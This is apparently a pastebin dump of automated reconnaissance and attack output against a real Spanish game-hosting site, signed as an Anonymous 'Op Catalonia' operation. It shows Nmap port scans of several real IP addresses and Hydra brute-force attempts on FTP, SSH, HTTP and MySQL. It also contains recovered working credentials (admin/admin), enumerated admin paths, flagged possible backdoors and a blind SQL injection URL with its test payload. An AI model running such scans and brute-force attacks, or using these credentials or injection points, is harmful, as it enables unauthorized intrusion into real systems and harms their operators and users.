- ################################### Running Port Scan #################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-11 13:00 EST
- Nmap scan report for 5.135.156.30
- Host is up (0.14s latency).
- Not shown: 15 filtered ports, 6 closed ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 80/tcp open http
- 443/tcp open https
- 3306/tcp open mysql
- Nmap done: 1 IP address (1 host up) scanned in 18.29 seconds
- ################################### Running Brute Force ###############################################################################
- + -- --=[Port 21 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-11 13:00:31
- [DATA] max 1 task per 1 server, overall 1 task, 225 login tries, ~225 tries per task
- [DATA] attacking ftp://5.135.156.30:21/
- [STATUS] 33.00 tries/min, 33 tries in 00:01h, 192 to do in 00:06h, 1 active
- [STATUS] 33.33 tries/min, 100 tries in 00:03h, 125 to do in 00:04h, 1 active
- [STATUS] 35.00 tries/min, 140 tries in 00:04h, 85 to do in 00:03h, 1 active
- [STATUS] 40.20 tries/min, 201 tries in 00:05h, 24 to do in 00:01h, 1 active
- 1 of 1 target completed, 0 valid passwords found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-11 13:05:50
- + -- --=[Port 22 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-11 13:05:50
- [DATA] max 1 task per 1 server, overall 1 task, 363 login tries, ~363 tries per task
- [DATA] attacking ssh://5.135.156.30:22/
- [STATUS] 26.00 tries/min, 26 tries in 00:01h, 340 to do in 00:14h, 1 active
- [STATUS] 51.00 tries/min, 153 tries in 00:03h, 213 to do in 00:05h, 1 active
- 1 of 1 target completed, 0 valid passwords found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-11 13:11:17
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-11 13:11:17
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking ssh://5.135.156.30:22/
- + -- --=[Port 23 closed... skipping.
- + -- --=[Port 25 closed... skipping.
- + -- --=[Port 80 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-11 13:11:17
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking http-get://5.135.156.30:80//
- [80][http-get] host: 5.135.156.30 login: admin password: admin
- [STATUS] attack finished for 5.135.156.30 (valid pair found)
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-11 13:11:19
- + -- --=[Port 110 closed... skipping.
- + -- --=[Port 139 closed... skipping.
- + -- --=[Port 162 closed... skipping.
- + -- --=[Port 389 closed... skipping.
- + -- --=[Port 443 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-11 13:11:19
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking http-gets://5.135.156.30:443//
- [443][http-get] host: 5.135.156.30 login: admin password: admin
- [STATUS] attack finished for 5.135.156.30 (valid pair found)
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-11 13:11:23
- + -- --=[Port 445 closed... skipping.
- + -- --=[Port 512 closed... skipping.
- + -- --=[Port 513 closed... skipping.
- + -- --=[Port 514 closed... skipping.
- + -- --=[Port 993 closed... skipping.
- + -- --=[Port 1433 closed... skipping.
- + -- --=[Port 1521 closed... skipping.
- + -- --=[Port 3306 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-11 13:11:23
- [DATA] max 1 task per 1 server, overall 1 task, 78 login tries, ~78 tries per task
- [DATA] attacking mysql://5.135.156.30:3306/
- 1 of 1 target completed, 0 valid passwords found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-11 13:12:04
- + -- --=[Port 3389 closed... skipping.
- + -- --=[Port 5432 closed... skipping.
- + -- --=[Port 5900 closed... skipping.
- + -- --=[Port 5901 closed... skipping.
- + -- --=[Port 8000 closed... skipping.
- + -- --=[Port 8080 closed... skipping.
- + -- --=[Port 8100 closed... skipping.
- + -- --=[Port 6667 closed... skipping.
- ################################### Done! #############################################################################################
- * default
- * default
- [*] Importing 'Nmap XML' data
- [*] Import: Parsing with 'Nokogiri v1.8.5'
- [*] Importing host 5.135.156.30
- [*] Successfully imported /usr/share/sniper/loot/5.135.156.30/nmap/nmap-udp-5.135.156.30.xml
- [*] Importing 'Nmap XML' data
- [*] Import: Parsing with 'Nokogiri v1.8.5'
- [*] Importing host 5.135.156.30
- [*] Successfully imported /usr/share/sniper/loot/5.135.156.30/nmap/nmap-5.135.156.30-udp.xml
- [*] Importing 'Nmap XML' data
- [*] Import: Parsing with 'Nokogiri v1.8.5'
- [*] Importing host 5.135.156.30
- [*] Successfully imported /usr/share/sniper/loot/5.135.156.30/nmap/nmap-5.135.156.30.xml
- Hosts
- =====
- address mac name os_name os_flavor os_sp purpose info comments
- ------- --- ---- ------- --------- ----- ------- ---- --------
- 5.135.156.30 Linux 2.4.X server
- 86.51.174.170 Linux 3.X server
- 91.121.2.184 Linux 2.6.X server
- 104.196.67.80 Linux 3.X server
- 195.55.47.89 Windows 3.X device
- Services
- ========
- host port proto name state info
- ---- ---- ----- ---- ----- ----
- 5.135.156.30 21 tcp ftp open ProFTPD or KnFTPD
- 5.135.156.30 22 tcp ssh open OpenSSH 5.9p1 Debian 5ubuntu1.4 Ubuntu Linux; protocol 2.0
- 5.135.156.30 53 udp domain open ISC BIND 9.8.1-P1
- 5.135.156.30 67 udp dhcps unknown
- 5.135.156.30 68 udp dhcpc unknown
- 5.135.156.30 69 udp tftp unknown
- 5.135.156.30 80 tcp http open nginx
- 5.135.156.30 88 udp kerberos-sec unknown
- 5.135.156.30 123 udp ntp unknown
- 5.135.156.30 137 udp netbios-ns filtered
- 5.135.156.30 138 udp netbios-dgm filtered
- 5.135.156.30 139 udp netbios-ssn unknown
- 5.135.156.30 161 udp snmp unknown
- 5.135.156.30 162 udp snmptrap unknown
- 5.135.156.30 389 udp ldap unknown
- 5.135.156.30 443 tcp ssl/http open nginx
- 5.135.156.30 520 udp route unknown
- 5.135.156.30 2049 udp nfs closed
- 5.135.156.30 3306 tcp mysql open MySQL blocked - too many connection errors
- 86.51.174.170 25 tcp smtp closed
- 86.51.174.170 53 udp domain unknown
- 86.51.174.170 67 udp dhcps unknown
- 86.51.174.170 68 udp dhcpc unknown
- 86.51.174.170 69 udp tftp unknown
- 86.51.174.170 80 tcp http-proxy open Squid http proxy
- 86.51.174.170 88 udp kerberos-sec unknown
- 86.51.174.170 123 udp ntp unknown
- 86.51.174.170 137 udp netbios-ns filtered
- 86.51.174.170 138 udp netbios-dgm filtered
- 86.51.174.170 139 tcp netbios-ssn closed
- 86.51.174.170 139 udp netbios-ssn unknown
- 86.51.174.170 161 udp snmp unknown
- 86.51.174.170 162 udp snmptrap unknown
- 86.51.174.170 389 udp ldap unknown
- 86.51.174.170 443 tcp ssl/http open Microsoft IIS httpd 8.5
- 86.51.174.170 445 tcp microsoft-ds closed
- 86.51.174.170 520 udp route unknown
- 86.51.174.170 2049 udp nfs unknown
- 91.121.2.184 22 tcp ssh open OpenSSH 5.3 protocol 2.0
- 91.121.2.184 25 tcp smtp closed
- 91.121.2.184 53 udp domain unknown
- 91.121.2.184 67 udp dhcps unknown
- 91.121.2.184 68 udp dhcpc unknown
- 91.121.2.184 69 udp tftp unknown
- 91.121.2.184 80 tcp http open Apache httpd PHP 5.6.14
- 91.121.2.184 88 udp kerberos-sec unknown
- 91.121.2.184 123 udp ntp unknown
- 91.121.2.184 137 udp netbios-ns filtered
- 91.121.2.184 138 udp netbios-dgm filtered
- 91.121.2.184 139 tcp netbios-ssn closed
- 91.121.2.184 139 udp netbios-ssn unknown
- 91.121.2.184 161 udp snmp unknown
- 91.121.2.184 162 udp snmptrap unknown
- 91.121.2.184 389 tcp ldap open OpenLDAP 2.2.X - 2.3.X
- 91.121.2.184 389 udp ldap unknown
- 91.121.2.184 443 tcp ssl/ssl open Apache httpd SSL-only mode
- 91.121.2.184 445 tcp microsoft-ds closed
- 91.121.2.184 465 tcp ssl/smtps open
- 91.121.2.184 520 udp route unknown
- 91.121.2.184 993 tcp ssl/imaps open
- 91.121.2.184 2049 udp nfs unknown
- 91.121.2.184 7071 tcp ssl/iwg1 open
- 91.121.2.184 8080 tcp ssh open OpenSSH 5.3 protocol 2.0
- 104.196.67.80 25 tcp smtp closed
- 104.196.67.80 53 udp domain unknown
- 104.196.67.80 67 udp dhcps unknown
- 104.196.67.80 68 udp dhcpc unknown
- 104.196.67.80 69 udp tftp unknown
- 104.196.67.80 80 tcp http-proxy open Squid http proxy
- 104.196.67.80 88 udp kerberos-sec unknown
- 104.196.67.80 123 udp ntp unknown
- 104.196.67.80 137 udp netbios-ns filtered
- 104.196.67.80 138 udp netbios-dgm filtered
- 104.196.67.80 139 tcp netbios-ssn closed
- 104.196.67.80 139 udp netbios-ssn unknown
- 104.196.67.80 161 udp snmp unknown
- 104.196.67.80 162 udp snmptrap unknown
- 104.196.67.80 389 udp ldap unknown
- 104.196.67.80 443 tcp ssl/http open nginx
- 104.196.67.80 445 tcp microsoft-ds closed
- 104.196.67.80 520 udp route unknown
- 104.196.67.80 2049 udp nfs unknown
- 104.196.67.80 2222 tcp ssh open ProFTPD mod_sftp 0.9.9 protocol 2.0
- 195.55.47.89 25 tcp smtp closed
- 195.55.47.89 53 udp domain unknown
- 195.55.47.89 67 udp dhcps unknown
- 195.55.47.89 68 udp dhcpc unknown
- 195.55.47.89 69 udp tftp unknown
- 195.55.47.89 80 tcp http-proxy open Squid http proxy
- 195.55.47.89 88 udp kerberos-sec unknown
- 195.55.47.89 113 tcp ident closed
- 195.55.47.89 123 udp ntp unknown
- 195.55.47.89 137 udp netbios-ns filtered
- 195.55.47.89 138 udp netbios-dgm filtered
- 195.55.47.89 139 tcp netbios-ssn closed
- 195.55.47.89 139 udp netbios-ssn unknown
- 195.55.47.89 161 udp snmp unknown
- 195.55.47.89 162 udp snmptrap unknown
- 195.55.47.89 389 udp ldap unknown
- 195.55.47.89 443 tcp https open Microsoft-HTTPAPI/2.0
- 195.55.47.89 445 tcp microsoft-ds closed
- 195.55.47.89 520 udp route unknown
- 195.55.47.89 2049 udp nfs unknown
- #######################################################################################################################################
- =======================================================================================================================================
- | Domain: http://gamehosting.es/
- | IP: 5.135.156.30
- =======================================================================================================================================
- |
- | Directory check:
- | [+] CODE: 200 URL: http://gamehosting.es/adclick/
- | [+] CODE: 200 URL: http://gamehosting.es/adsales/
- | [+] CODE: 200 URL: http://gamehosting.es/adsense/
- | [+] CODE: 200 URL: http://gamehosting.es/adserver/
- | [+] CODE: 200 URL: http://gamehosting.es/adserv/
- | [+] CODE: 200 URL: http://gamehosting.es/adserve/
- | [+] CODE: 200 URL: http://gamehosting.es/adsrv/
- | [+] CODE: 200 URL: http://gamehosting.es/agmp/
- | [+] CODE: 200 URL: http://gamehosting.es/adbanner/
- | [+] CODE: 200 URL: http://gamehosting.es/advert/
- | [+] CODE: 200 URL: http://gamehosting.es/bannerad/
- | [+] CODE: 200 URL: http://gamehosting.es/gamex/
- | [+] CODE: 200 URL: http://gamehosting.es/game/
- | [+] CODE: 200 URL: http://gamehosting.es/phpads/
- | [+] CODE: 200 URL: http://gamehosting.es/phpmyadmin/
- | [+] CODE: 200 URL: http://gamehosting.es/publicidad/
- | [+] CODE: 200 URL: http://gamehosting.es/publicidade/
- | [+] CODE: 200 URL: http://gamehosting.es/site/
- | [+] CODE: 200 URL: http://gamehosting.es/siteads/
- | [+] CODE: 200 URL: http://gamehosting.es/textads/
- | [+] CODE: 200 URL: http://gamehosting.es/venta/
- | [+] CODE: 200 URL: http://gamehosting.es/webmail/
- ######################################################################################################################################
- | File check:
- | [+] CODE: 200 URL: http://gamehosting.es/admentor/adminadmin.asp
- | [+] CODE: 200 URL: http://gamehosting.es/cgi-bin/clickcount.pl?view=test
- | [+] CODE: 200 URL: http://gamehosting.es/cgi-bin/counterbanner-ord
- | [+] CODE: 200 URL: http://gamehosting.es/cgi-bin/counterbanner
- | [+] CODE: 200 URL: http://gamehosting.es/cgi-bin/counterfiglet-ord
- | [+] CODE: 200 URL: http://gamehosting.es/cgi-bin/counter-ord
- | [+] CODE: 200 URL: http://gamehosting.es/index.html
- | [+] CODE: 200 URL: http://gamehosting.es/robots.txt
- | [+] CODE: 200 URL: http://gamehosting.es/sitemap.xml
- | [+] CODE: 200 URL: http://gamehosting.es/scripts/fpcount.exe
- | [+] CODE: 200 URL: http://gamehosting.es/_vti_bin/fpcount.exe
- =======================================================================================================================================
- |
- | Check robots.txt:
- |
- | Check sitemap.xml:
- | [+] http://gamehosting.es/Ddos.php
- | [+] http://gamehosting.es/about.html
- | [+] http://gamehosting.es/agmp/
- | [+] http://gamehosting.es/contact.html
- | [+] http://gamehosting.es/game-server-free.html
- | [+] http://gamehosting.es/game-server.html
- | [+] http://gamehosting.es/game/
- | [+] http://gamehosting.es/game/index.php?l=de
- | [+] http://gamehosting.es/game/index.php?l=dk
- | [+] http://gamehosting.es/game/index.php?l=es
- | [+] http://gamehosting.es/game/index.php?l=it
- | [+] http://gamehosting.es/game/index.php?l=uk
- | [+] http://gamehosting.es/game/index.php?s=about&l=de
- | [+] http://gamehosting.es/game/index.php?s=about&l=dk
- | [+] http://gamehosting.es/game/index.php?s=about&l=es
- | [+] http://gamehosting.es/game/index.php?s=about&l=it
- | [+] http://gamehosting.es/game/index.php?s=about&l=uk
- | [+] http://gamehosting.es/game/index.php?s=contact&l=de
- | [+] http://gamehosting.es/game/index.php?s=contact&l=dk
- | [+] http://gamehosting.es/game/index.php?s=contact&l=es
- | [+] http://gamehosting.es/game/index.php?s=contact&l=it
- | [+] http://gamehosting.es/game/index.php?s=contact&l=uk
- | [+] http://gamehosting.es/game/index.php?s=downloads&l=de
- | [+] http://gamehosting.es/game/index.php?s=downloads&l=dk
- | [+] http://gamehosting.es/game/index.php?s=downloads&l=es
- | [+] http://gamehosting.es/game/index.php?s=downloads&l=it
- | [+] http://gamehosting.es/game/index.php?s=downloads&l=uk
- | [+] http://gamehosting.es/game/index.php?s=gallery&l=de
- | [+] http://gamehosting.es/game/index.php?s=gallery&l=dk
- | [+] http://gamehosting.es/game/index.php?s=gallery&l=es
- | [+] http://gamehosting.es/game/index.php?s=gallery&l=it
- | [+] http://gamehosting.es/game/index.php?s=gallery&l=uk
- | [+] http://gamehosting.es/game/index.php?s=home&l=de
- | [+] http://gamehosting.es/game/index.php?s=home&l=dk
- | [+] http://gamehosting.es/game/index.php?s=home&l=es
- | [+] http://gamehosting.es/game/index.php?s=home&l=it
- | [+] http://gamehosting.es/game/index.php?s=home&l=uk
- | [+] http://gamehosting.es/game/index.php?s=imprint&l=de
- | [+] http://gamehosting.es/game/index.php?s=imprint&l=dk
- | [+] http://gamehosting.es/game/index.php?s=imprint&l=es
- | [+] http://gamehosting.es/game/index.php?s=imprint&l=it
- | [+] http://gamehosting.es/game/index.php?s=imprint&l=uk
- | [+] http://gamehosting.es/game/index.php?s=news&id=2&l=es
- | [+] http://gamehosting.es/game/index.php?s=news&id=2&l=it
- | [+] http://gamehosting.es/game/index.php?s=news&id=2&l=uk
- | [+] http://gamehosting.es/game/index.php?s=news&id=3&l=es
- | [+] http://gamehosting.es/game/index.php?s=news&id=3&l=it
- | [+] http://gamehosting.es/game/index.php?s=news&id=3&l=uk
- | [+] http://gamehosting.es/game/index.php?s=news&l=de
- | [+] http://gamehosting.es/game/index.php?s=news&l=dk
- | [+] http://gamehosting.es/game/index.php?s=news&l=es
- | [+] http://gamehosting.es/game/index.php?s=news&l=it
- | [+] http://gamehosting.es/game/index.php?s=news&l=uk
- | [+] http://gamehosting.es/game/index.php?s=protectioncheck&l=de
- | [+] http://gamehosting.es/game/index.php?s=protectioncheck&l=dk
- | [+] http://gamehosting.es/game/index.php?s=protectioncheck&l=es
- | [+] http://gamehosting.es/game/index.php?s=protectioncheck&l=it
- | [+] http://gamehosting.es/game/index.php?s=protectioncheck&l=uk
- | [+] http://gamehosting.es/game/index.php?s=search&l=de
- | [+] http://gamehosting.es/game/index.php?s=search&l=dk
- | [+] http://gamehosting.es/game/index.php?s=search&l=es
- | [+] http://gamehosting.es/game/index.php?s=search&l=it
- | [+] http://gamehosting.es/game/index.php?s=search&l=uk
- | [+] http://gamehosting.es/game/index.php?s=sitemap&l=de
- | [+] http://gamehosting.es/game/index.php?s=sitemap&l=dk
- | [+] http://gamehosting.es/game/index.php?s=sitemap&l=es
- | [+] http://gamehosting.es/game/index.php?s=sitemap&l=it
- | [+] http://gamehosting.es/game/index.php?s=sitemap&l=uk
- | [+] http://gamehosting.es/game/index.php?site=about
- | [+] http://gamehosting.es/game/index.php?site=contact
- | [+] http://gamehosting.es/game/index.php?site=downloads
- | [+] http://gamehosting.es/game/index.php?site=gallery
- | [+] http://gamehosting.es/game/index.php?site=imprint
- | [+] http://gamehosting.es/game/index.php?site=lendserver
- | [+] http://gamehosting.es/game/index.php?site=lendserver&d=gs
- | [+] http://gamehosting.es/game/index.php?site=lendserver&d=vo
- | [+] http://gamehosting.es/game/index.php?site=news
- | [+] http://gamehosting.es/game/index.php?site=news&id=2
- | [+] http://gamehosting.es/game/index.php?site=news&id=3
- | [+] http://gamehosting.es/game/index.php?site=protectioncheck
- | [+] http://gamehosting.es/game/index.php?site=register
- | [+] http://gamehosting.es/game/index.php?site=search
- | [+] http://gamehosting.es/game/index.php?site=sitemap
- | [+] http://gamehosting.es/game/login.php
- | [+] http://gamehosting.es/game/login.php?w=pr
- | [+] http://gamehosting.es/google343aebe6ed7c7685.html
- | [+] http://gamehosting.es/index.html
- | [+] http://gamehosting.es/venta/cart.php
- | [+] http://gamehosting.es/venta/cart.php?a=add&pid=1
- | [+] http://gamehosting.es/venta/cart.php?a=add&pid=11
- | [+] http://gamehosting.es/venta/cart.php?a=add&pid=12
- | [+] http://gamehosting.es/venta/cart.php?a=add&pid=15
- | [+] http://gamehosting.es/venta/cart.php?a=add&pid=2
- | [+] http://gamehosting.es/venta/cart.php?a=add&pid=20
- | [+] http://gamehosting.es/venta/cart.php?a=add&pid=3
- | [+] http://gamehosting.es/venta/cart.php?a=add&pid=42&carttpl=cart
- | [+] http://gamehosting.es/venta/cart.php?a=view
- | [+] http://gamehosting.es/venta/cart.php?gid=2
- | [+] http://gamehosting.es/venta/cart.php?gid=4a=add&pid=8
- | [+] http://gamehosting.es/venta/cart.php?gid=6
- | [+] http://gamehosting.es/venta/cart.php?gid=7
- | [+] http://gamehosting.es/venta/clientarea.php
- | [+] http://gamehosting.es/venta/cloudhosting.php
- | [+] http://gamehosting.es/venta/contact.php
- | [+] http://gamehosting.es/venta/game.php
- | [+] http://gamehosting.es/venta/gamepanel.php
- | [+] http://gamehosting.es/venta/index.php
- | [+] http://gamehosting.es/venta/knowledgebase.php
- | [+] http://gamehosting.es/venta/lendserver.php
- | [+] http://gamehosting.es/venta/privacy.php
- | [+] http://gamehosting.es/venta/submitticket.php
- | [+] http://gamehosting.es/venta/terms.php
- | [+] http://gamehosting.es/venta/voz.php
- | [+] http://gamehosting.es/voice-server.html
- | [+] http://gamehosting.es/webmail/
- =======================================================================================================================================
- #######################################################################################################################################
- | External hosts:
- | [+] External Host Found: http://www.ozerov.de
- | [+] External Host Found: https://l10n.cihar.com
- | [+] External Host Found: http://www.gnu.org
- | [+] External Host Found: http://www.phpmyadmin.net
- | [+] External Host Found: http://bugs.mysql.com
- | [+] External Host Found: http://blobstreaming.org
- | [+] External Host Found: https://apis.google.com
- | [+] External Host Found: http://phpmyadmin.net
- | [+] External Host Found: http://www.hardened-php.net
- | [+] External Host Found: http://contador-de-visitas.com
- | [+] External Host Found: http://www.php.net
- | [+] External Host Found: http://phpmyadmin.git.sourceforge.net
- | [+] External Host Found: http://en.wikipedia.org
- | [+] External Host Found: http://pecl.php.net
- | [+] External Host Found: http://cdn2.editmysite.com
- | [+] External Host Found: http://sf.net
- | [+] External Host Found: https://ajax.googleapis.com
- | [+] External Host Found: http://cdn1.editmysite.com
- | [+] External Host Found: http://www.ietf.org
- | [+] External Host Found: http://www.tcpdf.org
- | [+] External Host Found: https://sourceforge.net
- | [+] External Host Found: http://www.acko.net
- | [+] External Host Found: http://bugzilla.mozilla.org
- | [+] External Host Found: http://www.fpdf.org
- | [+] External Host Found: http://pear.php.net
- | [+] External Host Found: http://php.net
- | [+] External Host Found: http://developers.slashdot.org
- | [+] External Host Found: https://lists.sourceforge.net
- | [+] External Host Found: http://l10n.cihar.com
- | [+] External Host Found: http://httpd.apache.org
- | [+] External Host Found: https://html5shim.googlecode.com
- | [+] External Host Found: http://bugs.php.net
- | [+] External Host Found: http://wiki.phpmyadmin.net
- | [+] External Host Found: http://dd.cron.ru
- | [+] External Host Found: http://www.wikipedia.org
- | [+] External Host Found: http://www.
- | [+] External Host Found: http://dev.mysql.com
- #######################################################################################################################################
- | Web Backdoors:
- | [+] Possible Backdoor: http://gamehosting.es/venta/terms.php
- | [+] Possible Backdoor: http://gamehosting.es/game/index.php?site=imprint
- ======================================================================================================================================
- | E-mails:
- | [+] E-mail Found: michal@cihar.com
- | [+] E-mail Found: info@gamehosting.es
- ######################################################################################################################################
- |
- | Blind SQL Injection:
- | [+] Vul [Blind SQL-i]: http://gamehosting.es/venta/serverstatus.php?view=scheduled+AND+1=1
- | [+] Keyword: Programado
- =======================================================================================================================================
- ######################################################################################################################################
- Anonymous JTSEC #Op Catalonia Full Recon #1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement